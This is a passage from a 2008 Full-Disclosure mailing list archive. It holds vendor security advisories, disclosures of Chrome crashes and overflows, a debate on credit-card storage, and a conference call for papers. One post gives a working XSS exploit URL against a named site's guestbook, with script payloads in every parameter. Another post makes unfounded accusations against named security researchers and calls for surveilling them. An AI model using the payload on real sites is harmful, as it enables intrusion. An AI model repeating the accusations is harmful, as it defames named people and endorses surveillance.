http://www.securityfocus.com/bid/30983 > > Juha-Matti > > Rishi Narang [psy.echo at gmail.com] wrote: >> Hi, >> >> "Time" can definitely plays a major role. There was a collision that >> occurred due to the fact that I took time to find the real break point in >> the code, search for a template and to publish at EvilFingers site before >> sending it to Google and other bugtraqs. >> >> Even though I had the vulnerability 4 hrs well before the real publication >> of the bug and had the exploit along with the some crash details like "int >> 3" Kernel Exception/Trap @ 0x01002FF3, different attack cases, exceptions >> of http/ftp and further debug logs; there was this bug published (though >> without the details of possible cases, exceptions and mouse hover >> techniques) couple of hours before I released it out at EvilFingers. >> >> So, I would like to convey due credit to Mr. JanDeMooij as well for his >> posting the bug on http://code.google.com/p/chromium/issues/detail?id=122, >> and thanks to Mr. Brennan for contacting me about the same. >> >> -- >> Thanks & Regards, >> Rishi Narang | Security Researcher >> Founder, GREYHAT Insight >> Key: 0x8D67A3A3 (www.greyhat.in/key.asc) >> www.greyhat.in >> >> .. eschew obfuscation, espouse elucidation. >> >> Wednesday, September 3, 2008, 5:43:40 AM, you wrote: >> >> > -----Original Message----- >> > From: full-disclosure-bounces at lists.grok.org.uk >> > [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Rishi >> > Narang >> > Sent: Tuesday, September 02, 2008 7:51 PM >> > To: full-disclosure at lists.grok.org.uk >> > Subject: [Full-disclosure] Google Chrome Browser Vulnerability >> >> > Hi, >> >> > --------------------------------------------------- >> > Software: >> > Google Chrome Browser 0.2.149.27 >> >> > Tested: >> > Windows XP Professional SP3 >> >> > Result: >> > Google Chrome Crashes with All Tabs >> >> > Problem: >> > An issue exists in how chrome behaves with undefined-handlers in >> > chrome.dll version 0.2.149.27. A crash can result without user >> > interaction. When a user is made to visit a malicious link, which has an >> > undefined handler followed by a 'special' character, the chrome crashes >> > with a Google Chrome message window "Whoa! Google Chrome has crashed. >> > Restart now?". It fails in dealing with the POP EBP instruction when >> > pointed out by the EIP register at 0x01002FF4. >> >> > Proof of Concept: >> > http://evilfingers.com/advisory/google_chrome_poc.php >> >> > Credit: >> > Rishi Narang (psy.echo) >> > www.greyhat.in >> > www.evilfingers.com >> > --------------------------------------------------- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/x-pkcs7-signature Size: 7096 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080904/6fe0f457/attachment.bin From bugsquashr at gmail.com Thu Sep 4 21:05:38 2008 From: bugsquashr at gmail.com (bug squash) Date: Thu, 4 Sep 2008 16:05:38 -0400 Subject: [Full-disclosure] Xc0re Security Research Group GuestBook xss Message-ID: <819cb9500809041305t156f2b9bhbe2d8810f899fcd3@mail.gmail.com> ############################################################## # # Name : Xc0re Security Research Group GuestBook Xss # Author : El Chubacabra's Baby's Mama # Homepage : http://www.xc0re.net/ # ############################################################## Google dork: http://www.xc0re.net/ vulnerable - guestbook.cgi - comments, url, email, name parameters Exploit: http://www.xc0re.net/cgi-sys/guestbook.cgi?user=xc0rnet&action=addguest&basehref=http%3A%2F%2Fxc0re.net&template=default&name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&email=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&url=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&comments=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E sHoUtZ: Lame ass Muhammad Usman Saeed [Security Consultant] and Zainab Pervez "Submit your material now ! ;) 23-05-2008 Send all submissions like vulnerabilities , Papers &/or any thing related to security ! at submit at xc0re.net ! All the material submitted would be displayed on our website with its original author's name !" >you got it pal! And to my main man HUSSIN X - the most l33t h4x0r on the planet and possibly the solar system. From avri.schneider at gmail.com Thu Sep 4 23:16:29 2008 From: avri.schneider at gmail.com (Avraham Schneider) Date: Fri, 5 Sep 2008 01:16:29 +0300 Subject: [Full-disclosure] Hardcoded Keys In-Reply-To: References: <4d413ee20809030231y43db8a44s4045876b1e91d57e@mail.gmail.com> <20080904002313.F473.5922242B@shaunc.com> Message-ID: > I believe it almost never happens. As I understand the card association > rules, the merchant has to hang on to the data for refund purposes. . . . > A few years ago I worked on a corporate credit-card processing system, and > I pushed for keeping a cryptographic hash of the credit card number, but > not the number itself. That would have eliminated the need to encrypt > card numbers, and any basis for accusing a programer of stealing card numbers. > > Alas, between card association rules, and the anti-fraud group wanting the > exact card number, my idea got discarded. Why didn't you suggest encrypting card numbers, without storing the decryption keys? If the user wants a refund - he will have to type his password (which will be the key) to decrypt the card number and the decrypted card number will be sent to the processing gateway. Since the user's password is not stored in the database, just the hash of it, you don't risk an attacker getting access to all credit card numbers if/once he hacks into your server... On Thu, Sep 4, 2008 at 8:21 PM, Bruce Ediger wrote: > >> On Wed, 3 Sep 2008 16:31:25 +0700 >> "Samuel Beckett" wrote: >>> After the successful credit card transaction, certain credit card details >>> are then encrypted and stored within the database. > > And then, on Thu, 4 Sep 2008, Shaun wrote: >> There is your worst case. Game over. > > Agreed. Keeping card number/CVV2 (or CID, or CVC, whatever you call it)/ > expiration date constitutes a real problem. > >> You process my transaction, you are done with my certain credit card >> details the moment you get an auth or nack from your gateway. You as a >> vendor should never see my credit card number to start with. You should >> be passing my transaction to an originating bank. Alas, we know this >> rarely happens. > > I believe it almost never happens. As I understand the card association > rules, the merchant has to hang on to the data for refund purposes. > > I will grant you that Chase/Paymentech will do arbitrary refunds, but I > don't think that's the case for other payment processors (the "gateway" > you mention above). In fact, I believe BillMatrix will only refund > a previously authorized and settled payment. The merchant has to have > all the right data, otherwise BillMatrix will reject the refund. > > A few years ago I worked on a corporate credit-card processing system, and > I pushed for keeping a cryptographic hash of the credit card number, but > not the number itself. That would have eliminated the need to encrypt > card numbers, and any basis for accusing a programer of stealing card numbers. > > Alas, between card association rules, and the anti-fraud group wanting the > exact card number, my idea got discarded. > > Since we're on the topic of credit cards, why don't we hear more about > refund fraud? As near as I can tell, that's the part of the system > that an insider could abuse the hell out of. Most corporations have some > kind of internal accounting, so that making fake or fraudulent payments > really can only happen for a few dollars, and then only for a month, or > whatever the accounting period happens to be. But refunds, that's another > story. As of 2 years ago, Paymentech would do arbitrary refunds: they > didn't care if a corresponding payment had ever gotten authorized and > settled. And corporations leave the decision about refunds up to > customer service reps in a lot of cases. At the very least, there's little > to no accounting for the refunds. A place ripe for a huge fraud to take > place, if you ask me. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From security at mandriva.com Thu Sep 4 23:35:01 2008 From: security at mandriva.com (security at mandriva.com) Date: Thu, 04 Sep 2008 16:35:01 -0600 Subject: [Full-disclosure] [ MDVSA-2008:186 ] python Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:186 http://www.mandriva.com/security/ _______________________________________________________________________ Package : python Date : September 4, 2008 Affected: Corporate 3.0, Multi Network Firewall 2.0 _______________________________________________________________________ Problem Description: Multiple integer overflows were reported by the Google Security Team that had been fixed in Python 2.5.2 (CVE-2008-3143). The Python packages on Corporate 3 have been updated to the latest version 2.3.7, which corrects this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3143 _______________________________________________________________________ Updated Packages: Corporate 3.0: 34e780fd42571387982688486bcfdad6 corporate/3.0/i586/libpython2.3-2.3.7-0.1.C30mdk.i586.rpm 9b0043b0cae2f92eb39a3cb48e35a50e corporate/3.0/i586/libpython2.3-devel-2.3.7-0.1.C30mdk.i586.rpm 27ec7af68b8ac69feef9d2e9c3f59d65 corporate/3.0/i586/python-2.3.7-0.1.C30mdk.i586.rpm 16a7791f08cf7d89a5780b8c25f4d65d corporate/3.0/i586/python-base-2.3.7-0.1.C30mdk.i586.rpm 2b2e39c9db5794abdd895220a38d8cd8 corporate/3.0/i586/python-docs-2.3.7-0.1.C30mdk.i586.rpm a631b1fd887fded582437d6799fffa5d corporate/3.0/i586/tkinter-2.3.7-0.1.C30mdk.i586.rpm a867d0a919c3fd0d9607d4cd64d89d3c corporate/3.0/SRPMS/python-2.3.7-0.1.C30mdk.src.rpm Corporate 3.0/X86_64: 3bea043cedbf23095e6aae6f4eacbe04 corporate/3.0/x86_64/lib64python2.3-2.3.7-0.1.C30mdk.x86_64.rpm 9d576933f0699d5b7f0fc1bb78fd7514 corporate/3.0/x86_64/lib64python2.3-devel-2.3.7-0.1.C30mdk.x86_64.rpm e8a8494fcd526c0f3433dc03cb35672b corporate/3.0/x86_64/python-2.3.7-0.1.C30mdk.x86_64.rpm 7bf8423818a1e1221b51f28e05e3c616 corporate/3.0/x86_64/python-base-2.3.7-0.1.C30mdk.x86_64.rpm 79d213fe64ac42cf95d4c4072c813cae corporate/3.0/x86_64/python-docs-2.3.7-0.1.C30mdk.x86_64.rpm 437b615287bf5022edb1700f6d8b8790 corporate/3.0/x86_64/tkinter-2.3.7-0.1.C30mdk.x86_64.rpm a867d0a919c3fd0d9607d4cd64d89d3c corporate/3.0/SRPMS/python-2.3.7-0.1.C30mdk.src.rpm Multi Network Firewall 2.0: 34e780fd42571387982688486bcfdad6 mnf/2.0/i586/libpython2.3-2.3.7-0.1.C30mdk.i586.rpm 27ec7af68b8ac69feef9d2e9c3f59d65 mnf/2.0/i586/python-2.3.7-0.1.C30mdk.i586.rpm 16a7791f08cf7d89a5780b8c25f4d65d mnf/2.0/i586/python-base-2.3.7-0.1.C30mdk.i586.rpm a867d0a919c3fd0d9607d4cd64d89d3c mnf/2.0/SRPMS/python-2.3.7-0.1.C30mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIwDfHmqjQ0CJFipgRAnpYAKDN/AxpERzTga5Uptum3VNeW2kRJwCcCWZv stvEAyS71HncWdMnJdg+IUQ= =XDEP -----END PGP SIGNATURE----- From tmdhat at gmail.com Thu Sep 4 23:42:25 2008 From: tmdhat at gmail.com (The Mad Hatter) Date: Thu, 4 Sep 2008 19:42:25 -0300 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: References: <6092063.749501220528773789.JavaMail.juha-matti.laurio@netti.fi> <5ae653bf0809040532i4080046em209db2ea16409185@mail.gmail.com> Message-ID: <200809041942.25458.tmdhat@gmail.com> On Thursday 04 September 2008 13:46:33 Chris Pritchard wrote: > I don't think it's "your" list, and even if it was, you didn't have to be > so rude about it > I -- as well as many others in the list I'm sure -- have given up on this thread. As usual, its popularity is propotional to how much it sucks. if anyone has anything useful to say please consider creating another thread. From gem at rellim.com Thu Sep 4 23:38:29 2008 From: gem at rellim.com (Gary E. Miller) Date: Thu, 4 Sep 2008 15:38:29 -0700 (PDT) Subject: [Full-disclosure] Hardcoded Keys In-Reply-To: References: <4d413ee20809030231y43db8a44s4045876b1e91d57e@mail.gmail.com> <20080904002313.F473.5922242B@shaunc.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Yo All! > I believe it almost never happens. As I understand the card association > rules, the merchant has to hang on to the data for refund purposes. Nope, all you need to generate a refund is the original transaction ID. At least with the processors I use. You can get the PCI requirements here: https://www.pcisecuritystandards.org/security_standards/pci_dss.shtml You are allowed to store the Card number, name and expiration date. Appendix B allows you to store that unencrypted. You are not allowed to store the mag stripe, CVC2 or PIN. RGDS GARY - --------------------------------------------------------------------------- Gary E. Miller Rellim 109 NW Wilmington Ave., Suite E, Bend, OR 97701 gem at rellim.com Tel:+1(541)382-8588 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFIwGNoBmnRqz71OvMRAvHmAKCepmVQ4F5fOWdxU5VOD9gTMYW3rACcCWfe Fv3+09X/t92G6Du76Z9Bocs= =YoK0 -----END PGP SIGNATURE----- From xploitable at gmail.com Fri Sep 5 00:33:58 2008 From: xploitable at gmail.com (n3td3v) Date: Fri, 5 Sep 2008 00:33:58 +0100 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <4b6ee9310809041632m5d7c3394o3769c8a150424c85@mail.gmail.com> References: <6092063.749501220528773789.JavaMail.juha-matti.laurio@netti.fi> <5ae653bf0809040532i4080046em209db2ea16409185@mail.gmail.com> <4b6ee9310809041632m5d7c3394o3769c8a150424c85@mail.gmail.com> Message-ID: <4b6ee9310809041633yb8e4b77vc00d8344f00bc60f@mail.gmail.com> On Thu, Sep 4, 2008 at 5:46 PM, Chris Pritchard wrote: > I don't think it's "your" list, and even if it was, you didn't have to be so > rude about it > Its Gadi Evron's list because Mossad told him to make it so. Who's really in control of the propaganda on this mailing list, Gadi Evron, he gets quoted in all the journalist articles as soon as he spams some new claim about which country is to blame for a cyber attack, and the journalists believe him, then it becomes the true version of events... even if its not really. Thats why I think its time for journalists to rethink who the "trusted" security professionals are and who is gaming the system for political outcomes, that an intelligence agency has told them to make happen. Its true that Full-Disclosure is a powerful platform, and all it needs is a couple of Gadi Evron's and Dancho Danchev's spamming what the "truth" is and everyone goes with it. I find it suspicious that Dancho Danchev was a standard blogspot blogger one week, then after about two posts on Full-Disclosure was suddenly upgraded to the Zdnet zero-day blog... splitting out more information about cyber attacks and which country is to blame. We've got to keep an eye on the so-called "trusted" security professionals now, because they are trying to game the system for a political end, the intelligence services in U.S are responsible for a number of cyber attacks, which have been blamed on other countries and entities. I post proof that Marcus Sachs wants to influence the political system in America at the highest level of government, so his group can get lots of money. So we know the mind set which is going on right now, so its not like I haven't post proof, intelligence agencies and certain "trusted" security professionals want control of "cyber" and they will do anything they can to get it. We must proceed with caution and think carefully about who is telling the truth before quoting "trusted" security professionals from now on. The Marcus Sachs Youtube video is extremely damaging for the security industry, what the true intentions are of some people and how power hungry they are. Would Marcus Sachs, Gadi Evron and Dancho Danchev etc tell a lie to become more powerful, you bet they would, especially if being leaned on by certain rogue elements of the intelligence agencies. The truth is, there are people out there looking to ramp up cyber security as a national security agenda, even though naturally cyber security is no where near being a national security issue, they still want to ramp it up anyway because it will give them power and money in an area that has yet to be decided upon. "Cyber" is like a new area, and folks are racing to become the leaders of cyber before one another, thats why its a dangerous time right now and there is lots of propaganda flying around the mailing lists as soon as a cyber attack happens, which are probably false flags anyway created by the very people who are on Youtube videos looking for ways to become powerful with lots of money. I found the Cnet news article that goes with the Youtube video, we have *some* of the people that are power hungry in the photograph thats on the Cnet News article. 'Cybersecurity commission' to proffer advice to next president http://news.cnet.com/8301-13578_3-10009603-38.html We've got to follow these people around in real life, monitor their internet connection and phone calls to see who are have discussions with, so no foul play happens because they are so desperate to impress the next administration. All the best, n3td3v From smaillist at gmail.com Fri Sep 5 08:45:01 2008 From: smaillist at gmail.com (Sowhat) Date: Fri, 5 Sep 2008 15:45:01 +0800 Subject: [Full-disclosure] XCon 2008 Call for Paper Message-ID: XCon 2008 Call for Paper Nov. 18th ? 19th, 2008, Beijing, PRC (http://xcon.xfocus.net) XCon is wholeheartedly expecting papers from those who are passionate about information security technique and their participation and sharing of the conference. Attenders Anyone who loves information security, including information security experts and fans, network administrators, network security consultants, CIO, hacker technique fans, etc. Location : Beijing Jintai Hotel http://www.bjjintaihotel.com/ Topics include (but not limited to): --- Security in new fields - Vista - Web 2.0 - 3G/4G network - Mobile Handset - Banks & financial institutes - GRPS & CDMA - Routing device - Visualization technique --- Application security - Web application vulnerability research - Application reverse engineering and related automated tools - Database security & attacks - Protocol security & exploitation - Advanced Trojans, worms and backdoor technique - Encryption & decryption technique --- Intrusion detection/forensics analysis - File system analysis & recovery - Real-time data structure recovery - Reverse engineering (malicious code analysis technique, vulnerability research) - Traffic analysis - Intrusion detection and anti-detection technique --- Wireless & VoIP security - 802.11x, CDPD, Bluetooth, WAP/TDMA, GSM, SMS - PDA & mobile protocol analysis - Palm, Pocket Pc - Wireless gateway - VoIP security & vulnerability analysis - WLANs hardening & vulnerability analysis ---P2P technique - Instant messenger (MSN, Skype, ICQ, etc.) - P2P application (BT, Emule, Thunder, online multi-media, etc.) Paper Submission The submitted paper will include the following information : 1) Brief introduction to the topic. Please clarify if the topic has been previously publicized, and if so, the distribution scope. 2) Speaker's self introduction and work experience. 3) Speaker's contact information: full name, alias, nationality, network nickname, e-mail, tel, fax, current working place and company, IM (MSN, ICQ, YM, AIM or others). 4) Presentation details: - duration - if any new tool/vulnerability/exploit will be released 5) The paper must include both PPT (for presentation) and WORD (for detailed description) in MS Office or OpenOffice format. All the papers will be submitted to cfp at xfocus.org for preliminary selection. The deadline for submission is Oct. 10th, 2008, and deadline for confirmation is Oct. 20th, 2008. No matter if the paper is accepted, we will officially inform you by the provided contact method within 5 working days. Some important dates * Deadline for submission ? Oct. 10th, 2008 * Deadline for confirmation ? Oct. 20th, 2008 Speakers' privilege If your paper is accepted by XCon, you will be invited to give an individual lecture in XCon. The speakers will be provided with : - Round-trip plane ticket (Economy class, and one person only. Foreign speakers up to 1,200 USD) - Two days' food and accommodation - Invitation to celebration party - Tour to some well-known scenic spots and historical sites in Beijing, taste of Chinese flavored food - Luck draw Important : - Speakers must provide corresponding invoice or credential. - XCon reserves the right of final explanation. For more information about the conference, please contact xcon at xfocus.org or professional XCon2008 organizer. MSN: xfocusxcon at hotmail.com; tel : 086-010-62029792 Application In order to attend the conference, please register at XCon website ( http://xcon.xfocus.net) or directly contact the organizer mentioned above. We will offer different discounts according to the time of application. Attenders' food and accommodation will be covered by themselves, and XCon will provide restaurant reservation and other service. Other information : All the information about XCon will be released on XCon and Xfocus website. Please visit http://xcon.xfocus.org/ for more information about speakers, agenda and previous XCon documents. Thank you for your support on XCon ! -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080905/e5b16fc9/attachment.html From smaillist at gmail.com Fri Sep 5 09:40:19 2008 From: smaillist at gmail.com (Sowhat) Date: Fri, 5 Sep 2008 16:40:19 +0800 Subject: [Full-disclosure] XCon 2008 Call for Paper In-Reply-To: References: Message-ID: Got couple of emails with comments (language mistakes) and questions, Thanks guys! Actually XCon is held by XFOCUS guys (Casper and others), they wrote it up and I was just helping to post the CFP. If you have any questions regarding the schedule, the conferences, the hotel, etc. Welcome to XCon! Welcome to China! Best Sowhat On Fri, Sep 5, 2008 at 3:45 PM, Sowhat wrote: > XCon 2008 Call for Paper > > Nov. 18th ? 19th, 2008, Beijing, PRC (http://xcon.xfocus.net) > > XCon is wholeheartedly expecting papers from those who are passionate > about information security technique and their participation and sharing of > the conference. > > Attenders > Anyone who loves information security, including information security > experts and fans, network administrators, network security consultants, CIO, > hacker technique fans, etc. > > Location : Beijing Jintai Hotel http://www.bjjintaihotel.com/ > > Topics include (but not limited to): > > --- Security in new fields > - Vista > - Web 2.0 > - 3G/4G network > - Mobile Handset > - Banks & financial institutes > - GRPS & CDMA > - Routing device > - Visualization technique > > --- Application security > - Web application vulnerability research > - Application reverse engineering and related automated tools > - Database security & attacks > - Protocol security & exploitation > - Advanced Trojans, worms and backdoor technique > - Encryption & decryption technique > > --- Intrusion detection/forensics analysis > - File system analysis & recovery > - Real-time data structure recovery > - Reverse engineering (malicious code analysis technique, > vulnerability research) > - Traffic analysis > - Intrusion detection and anti-detection technique > > --- Wireless & VoIP security > - 802.11x, CDPD, Bluetooth, WAP/TDMA, GSM, SMS > - PDA & mobile protocol analysis > - Palm, Pocket Pc > - Wireless gateway > - VoIP security & vulnerability analysis > - WLANs hardening & vulnerability analysis > > ---P2P technique > - Instant messenger (MSN, Skype, ICQ, etc.) > - P2P application (BT, Emule, Thunder, online multi-media, etc.) > > Paper Submission > > The submitted paper will include the following information : > 1) Brief introduction to the topic. Please clarify if the topic has been > previously publicized, and if so, the distribution scope. > 2) Speaker's self introduction and work experience. > 3) Speaker's contact information: full name, alias, nationality, network > nickname, e-mail, tel, fax, current working place and company, IM (MSN, ICQ, > YM, AIM or others). > 4) Presentation details: > - duration > - if any new tool/vulnerability/exploit will be released > 5) The paper must include both PPT (for presentation) and WORD (for > detailed description) in MS Office or OpenOffice format. > > All the papers will be submitted to cfp at xfocus.org for preliminary > selection. The deadline for submission is Oct. 10th, 2008, and deadline for > confirmation is Oct. 20th, 2008. No matter if the paper is accepted, we will > officially inform you by the provided contact method within 5 working days. > > Some important dates > * Deadline for submission ? Oct. 10th, 2008 > * Deadline for confirmation ? Oct. 20th, 2008 > > Speakers' privilege > If your paper is accepted by XCon, you will be invited to give an > individual lecture in XCon. The speakers will be provided with : > - Round-trip plane ticket (Economy class, and one person only. Foreign > speakers up to 1,200 USD) > - Two days' food and accommodation > - Invitation to celebration party > - Tour to some well-known scenic spots and historical sites in > Beijing, taste of Chinese flavored food > - Luck draw > Important : > - Speakers must provide corresponding invoice or credential. > - XCon reserves the right of final explanation. > > For more information about the conference, please contact xcon at xfocus.org or > professional XCon2008 organizer. MSN: xfocusxcon at hotmail.com; tel : > 086-010-62029792 > > Application > > In order to attend the conference, please register at XCon website > (http://xcon.xfocus.net) or directly contact the organizer mentioned above. > We will offer different discounts according to the time of application. > Attenders' food and accommodation will be covered by themselves, and XCon > will provide restaurant reservation and other service. > > Other information : > > All the information about XCon will be released on XCon and Xfocus website. > Please visit http://xcon.xfocus.org/ for more information about speakers, > agenda and previous XCon documents. > > Thank you for your support on XCon ! > > > -- Sowhat http://secway.org "Life is like a bug, Do you know how to exploit it ?" From smaillist at gmail.com Fri Sep 5 09:41:21 2008 From: smaillist at gmail.com (Sowhat) Date: Fri, 5 Sep 2008 16:41:21 +0800 Subject: [Full-disclosure] XCon 2008 Call for Paper In-Reply-To: References: Message-ID: If you have any questions, comments, please shoot against Casper ;) Though I am happy to forward it. On Fri, Sep 5, 2008 at 4:40 PM, Sowhat wrote: > Got couple of emails with comments (language mistakes) and questions, > Thanks guys! > > Actually XCon is held by XFOCUS guys (Casper and others), they wrote > it up and I was just helping to post the CFP. > > If you have any questions regarding the schedule, the conferences, > the hotel, etc. > > Welcome to XCon! Welcome to China! > > Best > Sowhat > > On Fri, Sep 5, 2008 at 3:45 PM, Sowhat wrote: >> XCon 2008 Call for Paper >> >> Nov. 18th ? 19th, 2008, Beijing, PRC (http://xcon.xfocus.net) >> >> XCon is wholeheartedly expecting papers from those who are passionate >> about information security technique and their participation and sharing of >> the conference. >> >> Attenders >> Anyone who loves information security, including information security >> experts and fans, network administrators, network security consultants, CIO, >> hacker technique fans, etc. >> >> Location : Beijing Jintai Hotel http://www.bjjintaihotel.com/ >> >> Topics include (but not limited to): >> >> --- Security in new fields >> - Vista >> - Web 2.0 >> - 3G/4G network >> - Mobile Handset >> - Banks & financial institutes >> - GRPS & CDMA >> - Routing device >> - Visualization technique >> >> --- Application security >> - Web application vulnerability research >> - Application reverse engineering and related automated tools >> - Database security & attacks >> - Protocol security & exploitation >> - Advanced Trojans, worms and backdoor technique >> - Encryption & decryption technique >> >> --- Intrusion detection/forensics analysis >> - File system analysis & recovery >> - Real-time data structure recovery >> - Reverse engineering (malicious code analysis technique, >> vulnerability research) >> - Traffic analysis >> - Intrusion detection and anti-detection technique >> >> --- Wireless & VoIP security >> - 802.11x, CDPD, Bluetooth, WAP/TDMA, GSM, SMS >> - PDA & mobile protocol analysis >> - Palm, Pocket Pc >> - Wireless gateway >> - VoIP security & vulnerability analysis >> - WLANs hardening & vulnerability analysis >> >> ---P2P technique >> - Instant messenger (MSN, Skype, ICQ, etc.) >> - P2P application (BT, Emule, Thunder, online multi-media, etc.) >> >> Paper Submission >> >> The submitted paper will include the following information : >> 1) Brief introduction to the topic. Please clarify if the topic has been >> previously publicized, and if so, the distribution scope. >> 2) Speaker's self introduction and work experience. >> 3) Speaker's contact information: full name, alias, nationality, network >> nickname, e-mail, tel, fax, current working place and company, IM (MSN, ICQ, >> YM, AIM or others). >> 4) Presentation details: >> - duration >> - if any new tool/vulnerability/exploit will be released >> 5) The paper must include both PPT (for presentation) and WORD (for >> detailed description) in MS Office or OpenOffice format. >> >> All the papers will be submitted to cfp at xfocus.org for preliminary >> selection. The deadline for submission is Oct. 10th, 2008, and deadline for >> confirmation is Oct. 20th, 2008. No matter if the paper is accepted, we will >> officially inform you by the provided contact method within 5 working days. >> >> Some important dates >> * Deadline for submission ? Oct. 10th, 2008 >> * Deadline for confirmation ? Oct. 20th, 2008 >> >> Speakers' privilege >> If your paper is accepted by XCon, you will be invited to give an >> individual lecture in XCon. The speakers will be provided with : >> - Round-trip plane ticket (Economy class, and one person only. Foreign >> speakers up to 1,200 USD) >> - Two days' food and accommodation >> - Invitation to celebration party >> - Tour to some well-known scenic spots and historical sites in >> Beijing, taste of Chinese flavored food >> - Luck draw >> Important : >> - Speakers must provide corresponding invoice or credential. >> - XCon reserves the right of final explanation. >> >> For more information about the conference, please contact xcon at xfocus.org or >> professional XCon2008 organizer. MSN: xfocusxcon at hotmail.com; tel : >> 086-010-62029792 >> >> Application >> >> In order to attend the conference, please register at XCon website >> (http://xcon.xfocus.net) or directly contact the organizer mentioned above. >> We will offer different discounts according to the time of application. >> Attenders' food and accommodation will be covered by themselves, and XCon >> will provide restaurant reservation and other service. >> >> Other information : >> >> All the information about XCon will be released on XCon and Xfocus website. >> Please visit http://xcon.xfocus.org/ for more information about speakers, >> agenda and previous XCon documents. >> >> Thank you for your support on XCon ! >> >> >> > > > > -- > Sowhat > http://secway.org > "Life is like a bug, Do you know how to exploit it ?" > -- Sowhat http://secway.org "Life is like a bug, Do you know how to exploit it ?" From announce-noreply at rpath.com Fri Sep 5 04:52:55 2008 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Thu, 04 Sep 2008 23:52:55 -0400 Subject: [Full-disclosure] rPSA-2008-0268-1 libtiff Message-ID: <48c0ad17.FyFsIApWBAzwv5Qs%announce-noreply@rpath.com> rPath Security Advisory: 2008-0268-1 Published: 2008-09-04 Products: rPath Linux 1 rPath Linux 2 Rating: Major Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: libtiff=conary.rpath.com at rpl:1/3.8.2-3.1-1 libtiff=conary.rpath.com at rpl:2/3.8.2-5-0.1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-2724 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2327 Description: Previous versions of the libtiff package contain buffer underflows that may allow user-assisted attackers to execute arbitrary code using maliciously crafted TIFF files. Note that applications linked against libtiff may also be affected by this vulnerability, and will be fixed by this update. http://wiki.rpath.com/Advisories:rPSA-2008-0268 Copyright 2008 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html From svrt at bkav.com.vn Fri Sep 5 14:12:49 2008 From: svrt at bkav.com.vn (SVRT) Date: Fri, 05 Sep 2008 20:12:49 +0700 Subject: [Full-disclosure] Google Chrome 0.2.149.27 'SaveAs' Function Buffer Overflow Vulnerability Message-ID: We (SVRT-Bkis) have just discovered vulnerability in Google Chrome 0.2.149.27. This is a Critical Buffer Overflow Vulnerability permiting hacker to perform a remote attack and take complete control of the affected system. We have submitted this Vulnerability to Google. They confirmed and assign a verifier for build 0.2.149.28. Proof of Concept: We tested Google Chrome 0.2.149.27 on Windows XP SP2 (Open Calculator) http://security.bkis.vn/Proof-Of-Concept/PoC-XPSP2.html With others Windows not XP SP 2: http://security.bkis.vn/Proof-Of-Concept/PoC-Crash.html Details: - Type of Issue : Buffer Overflow. - Affected Software : Google Chrome 0.2.149.27. - Exploitation Environment : Google Chrome on Windows XP SP2. - Impact: Remote code execution. - Rating : Critical. - Description : The vulnerability is caused due to a boundary error when handling the ?SaveAs? function. On saving a malicious page with an overly long title ( tag in HTML), the program causes a stack-based overflow and makes it possible for attackers to execute arbitrary code on users? systems. - How an attacker could exploit the issue : To exploit the Vulnerability, a hacker might construct a specially crafted Web page, which contains malicious code. He then tricks users into visiting his Website and convinces them to save this Page. Right after that, the code would be executed, giving him the privilege to make use of the affected system. - Discoverer : Le Duc Anh - SVRT - Bkis - About SVRT : SVRT, which is short for Security Vulnerability Research Team, is one of Bkis researching groups. SVRT specializes in the detection, alert and announcement of security vulnerabilities in software, operating systems, network protocols and embedded systems? - About Bkis : Bkis (Bach Khoa Internetwork Security) is Vietnamese leading Center in researching, deploying network security software and solutions. - Website : http://security.bkis.vn - Mail : svrt[at]bkav.com.vn -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080905/b0c578f7/attachment.html From pinar at pardus.org.tr Fri Sep 5 14:49:30 2008 From: pinar at pardus.org.tr (Pardus Security Team) Date: Fri, 05 Sep 2008 16:49:30 +0300 Subject: [Full-disclosure] [PLSA 2008-36] Ffmpeg: Multiple vulnerabilities Message-ID: <48C138EA.6080708@pardus.org.tr> ------------------------------------------------------------------------ Pardus Linux Security Advisory 2008-36 security at pardus.org.tr ------------------------------------------------------------------------ Date: 2008-09-05 Severity: 2 Type: Remote ------------------------------------------------------------------------ Summary ======= There are multiple vulnerabilities detected in ffmpeg. Please update your packages to the latest versions. Description 